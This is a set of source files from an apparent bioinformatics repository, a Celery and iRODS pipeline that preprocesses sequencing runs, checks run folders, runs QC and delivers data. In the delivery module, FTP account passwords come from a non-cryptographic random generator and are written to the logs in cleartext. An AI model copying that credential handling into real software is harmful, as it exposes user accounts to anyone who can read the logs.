f.get('read_label')\n lane = f.get('lane')\n ext = f.get('file_ext')\n sample_label = self.batch_info[bid].get('client_sample_id')\n sample_label = '_'.join(\n [sample_label.replace(' ', '_'), lane, read]) if lane else '_'.join(\n [sample_label.replace(' ', '_'), read])\n sample_label = '.'.join([sample_label, ext])\n dst = os.path.join(opath, self.batch_id, sample_label)\n\n self.logger.info(\"Coping {} into {}\".format(src, dst))\n if os.path.isfile(dst):\n self.logger.info('{} skipped'.format(os.path.basename(\n dst)))\n else:\n if not self.dry_run:\n copy.si(src, dst).delay()\n self.logger.info(\n '{} copied'.format(os.path.basename(dst)))\n else:\n msg = 'I have not found any file related to this ' \\\n 'Bika id: {}'.format(bid)\n self.logger.warning(msg)\n self.logger.info('{} skipped'.format(bid))\n\n def __execute_playbook(self, playbook, inventory_file,\n random_user, random_clear_text_password):\n path_exists(playbook, 
self.logger)\n path_exists(inventory_file, self.logger)\n\n variable_manager = VariableManager()\n loader = DataLoader()\n\n inventory = Inventory(loader=loader,\n variable_manager=variable_manager,\n host_list=inventory_file)\n\n Options = namedtuple('Options', ['listtags', 'listtasks',\n 'listhosts', 'syntax', 'connection',\n 'module_path', 'forks',\n 'remote_user', 'private_key_file',\n 'ssh_common_args', 'ssh_extra_args',\n 'sftp_extra_args', 'scp_extra_args',\n 'become', 'become_method',\n 'become_user', 'verbosity', 'check'])\n\n options = Options(listtags=False, listtasks=False, listhosts=False,\n syntax=False, connection='ssh', module_path=None,\n forks=1, remote_user=None,\n private_key_file=None, ssh_common_args=None,\n ssh_extra_args=None, sftp_extra_args=None,\n scp_extra_args=None, become=True,\n become_method='sudo', become_user='root',\n verbosity=None, check=False)\n\n variable_manager.extra_vars = {'r_user': random_user,\n 'r_password': random_clear_text_password}\n passwords = {}\n\n pbex = PlaybookExecutor(playbooks=[playbook],\n inventory=inventory,\n variable_manager=variable_manager,\n loader=loader, options=options,\n passwords=passwords)\n results = pbex.run()\n return results\n\n def run(self):\n if self.destination == 'path':\n io_conf = self.conf.get_io_section()\n if self.output_path:\n output_path = self.output_path\n else:\n output_path = io_conf.get('ds_export_path')\n\n # if not path_exists(output_path, logger, force=False):\n # ensure_dir(output_path)\n # path_exists(output_path, logger)\n self.__fs2fs_carrier(self.input_path, output_path)\n\n if self.destination == 'ftp':\n def pass_gen(length):\n import string\n import random\n\n ascii = string.ascii_letters + string.digits + '@-_'\n\n return \"\".join([list(set(ascii))[random.randint(0, len(list(set(\n ascii))) - 1)] for i in range(length)])\n\n random_user = pass_gen(8)\n random_clear_text_password = pass_gen(12)\n\n self.logger.info('Creating random account into the ftp server')\n self.logger.info('user: {}'.format(random_user))\n self.logger.info('password: {}'.format(random_clear_text_password))\n\n playbook_label = 'create_ftp_user.yml'\n if self.playbook_path:\n playbook_path = self.playbook_path\n else:\n io_conf = self.conf.get_io_section()\n playbook_path = os.path.expanduser(io_conf.get('playbooks_path'))\n playbook = os.path.join(playbook_path, playbook_label)\n path_exists(playbook, self.logger)\n\n inventory_label = 'inventory'\n if self.inventory:\n inventory = self.inventory\n else:\n io_conf = self.conf.get_io_section()\n inventory_path = os.path.expanduser(io_conf.get('playbooks_path'))\n inventory = os.path.join(inventory_path,\n inventory_label)\n path_exists(inventory, self.logger)\n\n results = self.__execute_playbook(playbook,\n inventory,\n random_user,\n random_clear_text_password)\n self.logger.info('Playbook result: {}'.format(results))\n\n if self.output_path:\n output_path = self.output_path\n else:\n io_conf = self.conf.get_io_section()\n output_path = os.path.join(io_conf.get('ftp_export_path'),\n random_user)\n path_exists(output_path, self.logger)\n\n self.__fs2fs_carrier(self.input_path, output_path)\n\n\nhelp_doc = \"\"\"\nHandle the delivery of NGS data obtained from the pre-processing step\n\"\"\"\n\n\ndef make_parser(parser):\n parser.add_argument('--batch_id', metavar=\"STRING\",\n help=\"Batch id from BikaLims\", required=True)\n parser.add_argument('--destination', '-d', type=str, choices=DESTINATIONS,\n help='where datasets have to be delivered',\n 
required=True)\n parser.add_argument('--dry_run', action='store_true', default=False,\n help='Delivery will be only described.')\n parser.add_argument('--input_path', '-i', metavar=\"PATH\",\n help=\"Where input datasets are stored\")\n parser.add_argument('--output_path', '-o', metavar=\"PATH\",\n help=\"Where output datasets have to be stored\")\n parser.add_argument('--playbook_path', metavar=\"PATH\",\n help=\"Path to playbooks dir\")\n parser.add_argument('--inventory', metavar=\"PATH\",\n help=\"Path to inventory file\")\n\n\ndef implementation(logger, args):\n workflow = DeliveryWorkflow(args=args, logger=logger)\n workflow.run()\n\n\ndef do_register(registration_list):\n registration_list.append(('delivery', help_doc, make_parser,\n implementation))\n"
},
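One hedged editorial note on the ftp branch of presta/delivery.py above: pass_gen draws from random.randint, which is not a cryptographic source. On Python 3.6+ the stdlib secrets module is the safer equivalent; a minimal sketch (illustrative, not from the repository):

import secrets
import string

def pass_gen(length):
    alphabet = string.ascii_letters + string.digits + '@-_'
    # secrets.choice uses the OS CSPRNG instead of the Mersenne Twister
    return ''.join(secrets.choice(alphabet) for _ in range(length))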
{
"alpha_fraction": 0.6858006119728088,
"alphanum_fraction": 0.6858006119728088,
"avg_line_length": 22.64285659790039,
"blob_id": "c0cecda5519a9ad1d22fe41d849daf129e241f62",
"content_id": "1ceee216bfbf29fe1d47ecbfee73a0409e24d471",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 331,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 14,
"path": "/presta/app/__init__.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import\nimport os\nfrom celery import Celery\n\napp = Celery('app',\n include=['app.tasks'])\n\n# Set default configuration module name\nos.environ.setdefault('CELERY_CONFIG_MODULE', 'app.celeryconfig')\n\napp.config_from_envvar('CELERY_CONFIG_MODULE')\n\nif __name__ == '__main__':\n app.start()\n"
},
{
"alpha_fraction": 0.5261182188987732,
"alphanum_fraction": 0.5273693799972534,
"avg_line_length": 33.3763427734375,
"blob_id": "e38f5ae1361695e052afff0c1e564c72cba1b58e",
"content_id": "28c0c091a60823ad51f79ae9e97dfeb94bff181b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3197,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 93,
"path": "/presta/check_rundirs.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "import os\n\nfrom presta.utils import path_exists, get_conf\nfrom presta.app.tasks import rd_ready_to_be_preprocessed, process_rundir\n\n\nclass RundirsRootpath(object):\n def __init__(self, args=None, logger=None):\n self.logger = logger\n\n conf = get_conf(logger, args.config_file)\n\n if args.root_path:\n self.root_path = args.root_path\n else:\n io_conf = conf.get_io_section()\n self.root_path = io_conf.get('rundirs_root_path')\n\n do_conf = conf.get_section('data_ownership')\n self.user = do_conf.get('user')\n self.group = do_conf.get('group')\n\n self.ir_conf = conf.get_irods_section()\n self.proc_rundir = args.proc_rundir\n\n\n def check(self):\n def flatten(l):\n out = []\n for item in l:\n if isinstance(item, (list, tuple)):\n out.extend(flatten(item))\n else:\n out.append(item)\n return out\n\n path_exists(self.root_path, self.logger)\n localroot, dirnames, filenames = os.walk(self.root_path).next()\n\n positive_labels = ['finished', \"ownership ok\" ,\n 'SampleSheet found', 'Barcodes have the same size', 'Metadata found']\n negative_labels = ['running ', \"waiting for ownership's modification\",\n 'SampleSheet not found',\n \"Barcodes don't have the same size\", 'Metadata not found']\n\n dir_dict = dict()\n for d in dirnames:\n dir_dict[d] = []\n d_path = os.path.join(self.root_path, d)\n checks = rd_ready_to_be_preprocessed(user=self.user,\n group=self.group,\n path=d_path,\n rd_label=d,\n ir_conf=self.ir_conf)\n\n if self.proc_rundir and checks[0] and checks[1] and checks[2][0]:\n process_rundir.delay(rd_path=d_path, rd_label=d)\n\n checks = flatten(checks)\n for i in range(len(checks)):\n if checks[i]:\n dir_dict[d].append(positive_labels[i])\n else:\n dir_dict[d].append(negative_labels[i])\n\n self.logger.info('Checking rundirs in: {}'.format(self.root_path))\n\n for d, labels in dir_dict.iteritems():\n self.logger.info(' ')\n self.logger.info('Rundir {}'.format(d))\n self.logger.info('{}'.format(labels))\n\n\nhelp_doc = \"\"\"\nStarting from a root path, print the state of all the rundirs found.\n\"\"\"\n\n\ndef make_parser(parser):\n parser.add_argument('--root_path', metavar=\"PATH\",\n help=\"alternative rundirs root path\")\n parser.add_argument('--proc_rundir', action='store_true',\n help='process rundir if ready')\n\n\ndef implementation(logger, args):\n rr = RundirsRootpath(logger=logger, args=args)\n rr.check()\n\n\ndef do_register(registration_list):\n registration_list.append(('check', help_doc, make_parser,\n implementation))\n"
},
{
"alpha_fraction": 0.6700000166893005,
"alphanum_fraction": 0.6700000166893005,
"avg_line_length": 19,
"blob_id": "b243757e1631ece270035d8fd25a6e8f166d86ff",
"content_id": "99e287802848bb29d434d6effebb3d49141d80cc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 500,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 25,
"path": "/Makefile",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "PRESTA_DIR=${HOME}/presta\nTARGETS=all install install_user clean uninstall\n\nall:\n\t@echo \"Try one of: ${TARGETS}\"\n\ninstall: build config\n\tpip install dist/*.whl\n\nbuild: clean\n\tpython setup.py bdist_wheel\n\nclean:\n\tpython setup.py clean --all\n\tfind . -regex '.*\\(\\.pyc\\|\\.pyo\\)' -exec rm -fv {} \\;\n\trm -rf dist *.egg-info\n\nconfig:\n\tmkdir -p ${PRESTA_DIR}\n\tif [ ! -f ${PRESTA_DIR}/presta_config.yml ]; then \\\n\t\tcp presta/config/presta_config.yml ${PRESTA_DIR}; \\\n\tfi\n\nuninstall:\n\tpip uninstall -y presta\n"
},
{
"alpha_fraction": 0.5075128674507141,
"alphanum_fraction": 0.5088788270950317,
"avg_line_length": 41.110618591308594,
"blob_id": "f6b573288643ca5fe43df39251ec7530f266b322",
"content_id": "69366379ec7bec00ce06fa22a77c8cbf15c90b15",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9517,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 226,
"path": "/presta/proc_rundir.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "import os.path\nimport sys\n\nfrom alta.utils import ensure_dir\nfrom presta.utils import path_exists, get_conf\nfrom presta.app.tasks import bcl2fastq, rd_collect_fastq, move, qc_runner, \\\n rd_ready_to_be_preprocessed, \\\n copy_samplesheet_from_irods, copy_run_info_to_irods, copy_run_parameters_to_irods, \\\n replace_values_into_samplesheet, sanitize_metadata, replace_index_cycles_into_run_info, copy_qc_dirs\nfrom celery import chain\n\n\nclass PreprocessingWorkflow(object):\n def __init__(self, args=None, logger=None):\n self.logger = logger\n rpath = args.rd_path\n cpath = args.rd_path.replace('running', 'completed')\n apath = os.path.join(cpath, 'raw')\n self.rd = {'rpath': rpath,\n 'cpath': cpath,\n 'apath': apath,\n 'label': os.path.basename(args.rd_path)\n }\n conf = get_conf(logger, args.config_file)\n self.conf = conf\n\n dspath = os.path.join(cpath, 'datasets')\n self.ds = {'path': dspath}\n\n fqc_basepath = os.path.join(dspath, 'fastqc')\n self.fqc = dict(path=fqc_basepath)\n\n io_conf = conf.get_io_section()\n export_path = os.path.join(io_conf.get('qc_export_basepath'),\n self.rd['label'])\n self.fqc.update(dict(export_path=export_path))\n\n ssheet = {'basepath': os.path.join(cpath),\n 'filename': 'SampleSheet.csv'}\n ssheet['file_path'] = os.path.join(ssheet['basepath'],\n ssheet['filename'])\n self.samplesheet = ssheet\n\n run_info = {'basepath': os.path.join(rpath),\n 'filename': 'RunInfo.xml'}\n run_info['file_path'] = os.path.join(run_info['basepath'],\n run_info['filename'])\n run_info['file_apath'] = os.path.join(apath,\n run_info['filename'])\n self.run_info = run_info\n\n run_parameters = {'basepath': os.path.join(rpath),\n 'filename': 'runParameters.xml'}\n run_parameters['file_path'] = os.path.join(run_parameters['basepath'],\n run_parameters['filename'])\n run_parameters['file_apath'] = os.path.join(apath,\n run_parameters['filename'])\n\n self.run_parameters = run_parameters\n\n do_conf = conf.get_section('data_ownership')\n self.user = do_conf.get('user')\n self.group = do_conf.get('group')\n\n self.no_lane_splitting = args.no_lane_splitting\n\n self.barcode_mismatches = args.barcode_mismatches\n\n self.overwrite_samplesheet = args.overwrite_samplesheet\n\n self.copy_qc = args.export_qc\n\n self.batch_queuing = args.batch_queuing\n self.queues_conf = conf.get_section('queues')\n\n self._add_config_from_cli(args)\n\n def _add_config_from_cli(self, args):\n if args.output:\n self.ds['path'] = args.output\n\n if args.fastqc_outdir:\n self.fqc['path'] = args.fastq_outdir\n\n def run(self):\n path_exists(self.rd['rpath'], self.logger)\n rd_status_checks = rd_ready_to_be_preprocessed(\n user=self.user,\n group=self.group,\n path=self.rd['rpath'],\n rd_label=self.rd['label'],\n ssht_filename=self.samplesheet['filename'],\n ir_conf=self.conf.get_irods_section())\n\n check = rd_status_checks[0] and rd_status_checks[1] and \\\n rd_status_checks[2][0]\n\n barcodes_have_same_size = rd_status_checks[2][1]\n check_sanitize_metadata = not rd_status_checks[3]\n\n if not check:\n self.logger.error(\"{} is not ready to be preprocessed\".format(\n self.rd['label']))\n sys.exit()\n\n self.logger.info('Processing {}'.format(self.rd['label']))\n self.logger.info('running path {}'.format(self.rd['rpath']))\n self.logger.info('completed path {}'.format(self.rd['cpath']))\n self.logger.info('archive path {}'.format(self.rd['apath']))\n self.logger.info('samplesheet path {}'.format(self.samplesheet['file_path']))\n\n ensure_dir(self.ds['path'])\n 
ensure_dir(self.fqc['path'])\n\n irods_task = chain(\n sanitize_metadata.si(conf=self.conf.get_irods_section(),\n ssht_filename=self.samplesheet['filename'],\n rd_label=self.rd['label'],\n sanitize=check_sanitize_metadata\n ),\n\n copy_run_info_to_irods.si(conf=self.conf.get_irods_section(),\n run_info_path=self.run_info['file_path'],\n rd_label=self.rd['label']\n ),\n\n copy_run_parameters_to_irods.si(conf=self.conf.get_irods_section(),\n run_parameters_path=self.run_parameters['file_path'],\n rd_label=self.rd['label']\n ),\n )\n\n samplesheet_task = chain(\n\n copy_samplesheet_from_irods.si(conf=self.conf.get_irods_section(),\n ssht_path=self.samplesheet['file_path'],\n rd_label=self.rd['label'],\n overwrite_samplesheet=self.overwrite_samplesheet\n ),\n\n replace_values_into_samplesheet.si(conf=self.conf.get_irods_section(),\n ssht_path=self.samplesheet['file_path'],\n rd_label=self.rd['label'],\n overwrite_samplesheet=self.overwrite_samplesheet\n ),\n\n )\n\n qc_task = chain(rd_collect_fastq.si(ds_path=self.ds['path']),\n qc_runner.s(outdir=self.fqc['path'],\n batch_queuing=self.batch_queuing,\n queue_spec=self.queues_conf.get('low')),\n copy_qc_dirs.si(src=self.fqc['path'],\n dest=self.fqc['export_path'],\n copy_qc=self.copy_qc),\n )\n\n # full pre-processing sequencing rundir pipeline\n pipeline = chain(\n irods_task,\n samplesheet_task,\n\n replace_index_cycles_into_run_info.si(conf=self.conf.get_irods_section(),\n barcodes_have_same_size=barcodes_have_same_size,\n run_info_path=self.run_info['file_path'],\n rd_label=self.rd['label']),\n\n move.si(self.rd['rpath'], self.rd['apath']),\n bcl2fastq.si(rd_path=self.rd['apath'],\n ds_path=self.ds['path'],\n ssht_path=self.samplesheet['file_path'],\n no_lane_splitting=self.no_lane_splitting,\n barcode_mismatches=self.barcode_mismatches,\n batch_queuing=self.batch_queuing,\n queue_spec=self.queues_conf.get('low')),\n\n replace_index_cycles_into_run_info.si(conf=self.conf.get_irods_section(),\n barcodes_have_same_size=barcodes_have_same_size,\n run_info_path=self.run_info['file_apath'],\n rd_label=self.rd['label']),\n\n qc_task,\n ).delay()\n\n\nhelp_doc = \"\"\"\nProcess a rundir\n\"\"\"\n\n\ndef make_parser(parser):\n parser.add_argument('--rd_path', metavar=\"PATH\",\n help=\"rundir path\", required=True)\n parser.add_argument('--output', type=str, help='output path', default='')\n\n parser.add_argument('--overwrite_samplesheet', dest='overwrite_samplesheet',\n action='store_true',\n help='Overwrite the samplesheet '\n 'if already present into the filesystem (default)')\n parser.add_argument('--no_overwrite_samplesheet', dest='overwrite_samplesheet',\n action='store_false',\n help='Do not overwrite the samplesheet '\n 'if already present into the filesystem')\n\n parser.add_argument('--fastqc_outdir', type=str, help='fastqc output path')\n\n parser.add_argument('--no_lane_splitting', action='store_true',\n help='Do not split fastq by lane')\n\n parser.add_argument('--export_qc', action='store_true',\n help='Export qc reports, running \"presta qc\"')\n\n parser.add_argument(\"--barcode_mismatches\", type=int, choices=[0, 1, 2],\n default=1, help='Number of allowed mismatches per index')\n\n parser.set_defaults(overwrite_samplesheet=True)\n\n\ndef implementation(logger, args):\n workflow = PreprocessingWorkflow(args=args, logger=logger)\n workflow.run()\n\n\ndef do_register(registration_list):\n registration_list.append(('proc', help_doc, make_parser,\n implementation))\n"
},
{
"alpha_fraction": 0.8139534592628479,
"alphanum_fraction": 0.8139534592628479,
"avg_line_length": 20,
"blob_id": "3a0ae474444dba3d44d15d0b7079d856fb743278",
"content_id": "0b598ae638526cc2d05b9dcf2a6059430426161c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 43,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "# presta\nPreprocessing of sequencing data \n"
},
{
"alpha_fraction": 0.554798424243927,
"alphanum_fraction": 0.5556501746177673,
"avg_line_length": 36.46808624267578,
"blob_id": "033fccfa92449a5c7076d7a469a61f08455d7996",
"content_id": "b9edddc204af2846a23ffa53088ffaff9cac0c82",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3522,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 94,
"path": "/presta/qc.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "import os.path\nimport sys\n\nfrom alta.utils import ensure_dir\nfrom celery import chain\nfrom presta.app.tasks import copy_qc_dirs, rd_collect_fastq, qc_runner\nfrom presta.utils import path_exists, get_conf\n\n\nclass QcWorkflow(object):\n def __init__(self, args=None, logger=None):\n self.logger = logger\n conf = get_conf(logger, args.config_file)\n self.batch_queuing = args.batch_queuing\n self.queues_conf = conf.get_section('queues')\n\n r_dir_label = args.rundir_label\n ds_dir_label = 'datasets'\n fqc_dir_label = 'fastqc'\n\n input_path = args.ds_path\n output_path = args.export_path\n\n if r_dir_label or (input_path and output_path):\n pass\n else:\n logger.error(\"You must provide the rundir_label or both ds_path \"\n \"and export_path\")\n sys.exit()\n\n # input path must exists as parser argument or as config file argument\n if not input_path:\n io_conf = conf.get_io_section()\n input_path = os.path.join(io_conf.get('archive_root_path'),\n r_dir_label,\n ds_dir_label)\n path_exists(input_path, logger)\n self.input_path = input_path\n\n # export path must exists as parser argument or as config file argument\n if not output_path:\n io_conf = conf.get_io_section()\n output_path = os.path.join(io_conf.get('qc_export_basepath'),\n r_dir_label)\n # FIXME: this is a local path, must be checked that run on right node\n if not path_exists(output_path, logger, force=False):\n ensure_dir(output_path)\n path_exists(output_path, logger)\n self.output_path = output_path\n\n self.fqc_path = os.path.join(self.input_path, fqc_dir_label)\n\n def run(self):\n\n copy_task = copy_qc_dirs.si(self.input_path, self.output_path)\n msgs = [\"Generating Fastqc reports\",\n \"Coping qc dirs from {} to {}\".format(self.input_path,\n self.output_path)]\n if not path_exists(self.fqc_path, self.logger, force=False):\n self.logger.info(\"{} and {}\".format(msgs[0], msgs[1]))\n ensure_dir(self.fqc_path)\n qc_task = chain(rd_collect_fastq.si(ds_path=self.input_path),\n qc_runner.s(outdir=self.fqc_path,\n batch_queuing=self.batch_queuing,\n queue_spec=self.queues_conf.get('q_fastqc')),\n copy_task\n ).delay()\n else:\n self.logger.info(msgs[1])\n copy_task.delay()\n\n\nhelp_doc = \"\"\"\nGenerate (if needed) and export quality control reports\n\"\"\"\n\n\ndef make_parser(parser):\n parser.add_argument('--rundir_label', '-r', metavar=\"STRING\",\n help='Label of the rundir to process')\n parser.add_argument('--ds_path', metavar=\"PATH\",\n help=\"Where datasets are stored\")\n parser.add_argument('--export_path', type=str, metavar=\"PATH\",\n help='Where qc reports have to be stored')\n\n\ndef implementation(logger, args):\n workflow = QcWorkflow(args=args, logger=logger)\n workflow.run()\n\n\ndef do_register(registration_list):\n registration_list.append(('qc', help_doc, make_parser,\n implementation))\n"
},
{
"alpha_fraction": 0.5709547400474548,
"alphanum_fraction": 0.5731295943260193,
"avg_line_length": 34.921875,
"blob_id": "147d1f8254fe186ca80ee3729ef5021b9b53495c",
"content_id": "1b5847d125a5f6955e99ee89b7fc8631e7c88bc2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18392,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 512,
"path": "/presta/app/tasks.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import\n\nfrom . import app\nfrom alta.objectstore import build_object_store\nfrom alta.utils import ensure_dir\nfrom celery import group\nimport drmaa\nfrom grp import getgrgid\nfrom presta.utils import IEMSampleSheetReader\nfrom presta.utils import IEMRunInfoReader\nfrom pwd import getpwuid\nimport errno\nimport os\nimport shlex\nimport shutil\nimport subprocess\n\nfrom celery.utils.log import get_task_logger\n\nlogger = get_task_logger(__name__)\n\n\[email protected](name='presta.app.tasks.check_rd_ready_to_be_preprocessed')\ndef check_rd_ready_to_be_preprocessed(**kwargs):\n logger.info('Cron Task: searching for run ready to be preprocessed...')\n cmd_line = ['presta', 'check', '--proc_rundir']\n output = runJob(cmd_line)\n return True if output else False\n\n\[email protected](name='presta.app.tasks.process_rundir')\ndef process_rundir(**kwargs):\n rd_path = kwargs.get('rd_path')\n rd_label = kwargs.get('rd_label')\n logger.info('Cron Task: {} is ready to be processed. Start preprocessing...'.format(rd_label))\n cmd_line = ['presta', 'proc', '--rd_path', rd_path, '--export_qc']\n output = runJob(cmd_line)\n return True if output else False\n\n\[email protected](name='presta.app.tasks.rd_collect_fastq')\ndef rd_collect_fastq(**kwargs):\n path = kwargs.get('ds_path')\n results = []\n for (localroot, dirnames, filenames) in os.walk(path):\n for f in filenames:\n if f[-3:] == '.gz':\n logger.info('FASTQ = {}'.format(f))\n results.append(os.path.join(localroot, f))\n return results\n\n\[email protected](name='presta.app.tasks.rd_ready_to_be_preprocessed')\ndef rd_ready_to_be_preprocessed(**kwargs):\n \"\"\"\n Verify if sequencer has ended to write, if rundir's ownership is\n correct and if samplesheet has been uploaded into iRODS\n \"\"\"\n path = kwargs.get('path')\n user = kwargs.get('user')\n grp = kwargs.get('group')\n rundir_label = kwargs.get('rd_label')\n samplesheet_filename = kwargs.get('ssht_filename', 'SampleSheet.csv')\n ir_conf = kwargs.get('ir_conf')\n ipath = os.path.join(ir_conf['runs_collection'],\n rundir_label,\n samplesheet_filename)\n\n task0 = seq_completed.si(path)\n task1 = check_ownership.si(user=user, group=grp, dir=path)\n task2 = samplesheet_ready.si(ir_conf, ipath)\n task3 = check_metadata.si(ir_conf, os.path.dirname(ipath))\n\n pipeline = group(task0, task1, task2, task3)()\n\n while pipeline.waiting():\n pass\n return pipeline.join()\n\n\[email protected](name='presta.app.tasks.samplesheet_ready')\ndef samplesheet_ready(ir_conf, ipath):\n ir = build_object_store(store='irods',\n host=ir_conf['host'],\n port=ir_conf['port'],\n user=ir_conf['user'],\n password=ir_conf['password'].encode('ascii'),\n zone=ir_conf['zone'])\n\n exists, iobj = ir.exists(ipath, delivery=True)\n ir.sess.cleanup()\n if exists:\n with iobj.open('r') as f:\n samplesheet = IEMSampleSheetReader(f)\n\n return exists, samplesheet.barcodes_have_the_same_size()\n else:\n return False, False\n\n\[email protected](name='presta.app.tasks.check_metadata')\ndef check_metadata(ir_conf, ipath, get_metadata=False):\n\n def retrieve_imetadata(iobj):\n return [dict(name=m.name,\n value=m.value,\n units=m.units)\n for m in iobj.metadata.items()]\n\n ir = build_object_store(store='irods',\n host=ir_conf['host'],\n port=ir_conf['port'],\n user=ir_conf['user'],\n password=ir_conf['password'].encode('ascii'),\n zone=ir_conf['zone'])\n\n exists, iobj = ir.exists(ipath, delivery=True)\n ir.sess.cleanup()\n\n if get_metadata:\n return exists and 
len(iobj.metadata.items()) > 0, retrieve_imetadata(iobj)\n\n return exists and len(iobj.metadata.items()) > 0\n\n\[email protected](name='presta.app.tasks.seq_completed')\ndef seq_completed(rd_path):\n illumina_last_file = 'RTAComplete.txt'\n localroot, dirnames, filenames = os.walk(rd_path).next()\n return True if illumina_last_file in filenames else False\n\n\[email protected](name='presta.app.task.check_ownership')\ndef check_ownership(**kwargs):\n user = kwargs.get('user')\n grp = kwargs.get('group')\n d = kwargs.get('dir')\n\n def find_owner(directory):\n return getpwuid(os.stat(directory).st_uid).pw_name\n\n def find_group(directory):\n return getgrgid(os.stat(directory).st_gid).gr_name\n\n return True if user == find_owner(d) and grp == find_group(d) else False\n\n\[email protected](name='presta.app.tasks.copy')\ndef copy(src, dest):\n result = False\n try:\n shutil.copytree(src, dest)\n result = True\n except OSError as e:\n if e.errno == errno.ENOTDIR:\n shutil.copy(src, dest)\n else:\n logger.error('Source not copied. Error: {}'.format(e))\n return result\n\n\[email protected](name='presta.app.tasks.copy_qc_dirs', ignore_result=True)\ndef copy_qc_dirs(src, dest, copy_qc=True):\n if copy_qc:\n dirs = ['Stats', 'Reports', 'fastqc']\n ensure_dir(dest)\n task0 = copy.si(os.path.join(src, dirs[0]), os.path.join(dest, dirs[0]))\n task1 = copy.si(os.path.join(src, dirs[1]), os.path.join(dest, dirs[1]))\n task2 = copy.si(os.path.join(src, dirs[2]), os.path.join(dest, dirs[2]))\n\n job = group(task0, task1, task2)()\n while job.waiting():\n pass\n return job.join()\n\n return None\n\n\[email protected](name='presta.app.tasks.sanitize_metadata', ignore_result=True)\ndef sanitize_metadata(**kwargs):\n ir_conf = kwargs.get('conf')\n rundir_label = kwargs.get('rd_label')\n samplesheet_filename = kwargs.get('ssht_filename')\n sanitize = kwargs.get('sanitize')\n\n if sanitize:\n rundir_ipath = os.path.join(ir_conf['runs_collection'],\n rundir_label)\n\n samplesheet_ipath = os.path.join(ir_conf['runs_collection'],\n rundir_label,\n samplesheet_filename)\n\n samplesheet_has_metadata, imetadata = check_metadata(ir_conf=ir_conf,\n ipath=samplesheet_ipath,\n get_metadata=True)\n if samplesheet_has_metadata:\n __set_imetadata(ir_conf=ir_conf,\n ipath=rundir_ipath,\n imetadata=imetadata)\n\n\[email protected](name='presta.app.tasks.copy_samplesheet_from_irods',\n ignore_result=True)\ndef copy_samplesheet_from_irods(**kwargs):\n ir_conf = kwargs.get('conf')\n samplesheet_file_path = kwargs.get('ssht_path')\n samplesheet_filename = os.path.basename(samplesheet_file_path)\n rundir_label = kwargs.get('rd_label')\n overwrite_samplesheet = kwargs.get('overwrite_samplesheet')\n\n if overwrite_samplesheet:\n ir = build_object_store(store='irods',\n host=ir_conf['host'],\n port=ir_conf['port'],\n user=ir_conf['user'],\n password=ir_conf['password'].encode('ascii'),\n zone=ir_conf['zone'])\n\n ipath = os.path.join(ir_conf['runs_collection'],\n rundir_label,\n samplesheet_filename)\n logger.info('Coping samplesheet from iRODS {} to FS {}'.format(\n ipath, samplesheet_file_path))\n ir.get_object(ipath, dest_path=samplesheet_file_path)\n ir.sess.cleanup()\n return samplesheet_file_path\n\n\[email protected](name='presta.app.tasks.copy_run_info_to_irods',\n ignore_result=True)\ndef copy_run_info_to_irods(**kwargs):\n ir_conf = kwargs.get('conf')\n run_info_file_path = kwargs.get('run_info_path')\n run_info_filename = os.path.basename(run_info_file_path)\n rundir_label = kwargs.get('rd_label')\n\n irods_path = 
os.path.join(ir_conf['runs_collection'],\n rundir_label,\n run_info_filename)\n\n __copy_file_into_irods(conf=ir_conf,\n file_path=run_info_file_path,\n irods_path=irods_path)\n\n return run_info_file_path\n\n\[email protected](name='presta.app.tasks.copy_run_parameters_to_irods',\n ignore_result=True)\ndef copy_run_parameters_to_irods(**kwargs):\n ir_conf = kwargs.get('conf')\n run_parameters_file_path = kwargs.get('run_parameters_path')\n run_parameters_filename = os.path.basename(run_parameters_file_path)\n rundir_label = kwargs.get('rd_label')\n\n irods_path = os.path.join(ir_conf['runs_collection'],\n rundir_label,\n run_parameters_filename)\n\n __copy_file_into_irods(conf=ir_conf,\n file_path=run_parameters_file_path,\n irods_path=irods_path)\n\n return run_parameters_file_path\n\n\[email protected](name='presta.app.tasks.replace_values_into_samplesheet',\n ignore_result=True)\ndef replace_values_into_samplesheet(**kwargs):\n\n samplesheet_file_path = kwargs.get('ssht_path')\n overwrite_samplesheet = kwargs.get('overwrite_samplesheet')\n\n if overwrite_samplesheet:\n with open(samplesheet_file_path, 'r') as f:\n samplesheet = IEMSampleSheetReader(f)\n\n with open(samplesheet_file_path, 'w') as f:\n for row in samplesheet.get_body(replace=True):\n f.write(row)\n\[email protected](name='presta.app.tasks.replace_index_cycles_into_run_info',\n ignore_result=True)\ndef replace_index_cycles_into_run_info(**kwargs):\n ir_conf = kwargs.get('conf')\n overwrite_run_info_file = not kwargs.get('barcodes_have_same_size')\n run_info_file_path = kwargs.get('run_info_path')\n rundir_label = kwargs.get('rd_label')\n\n if overwrite_run_info_file:\n index_cycles_from_metadata = __get_index_cycles_from_metadata(ir_conf=ir_conf,\n rundir_label=rundir_label)\n\n index_cycles_from_run_info_file, default_index_cycles = 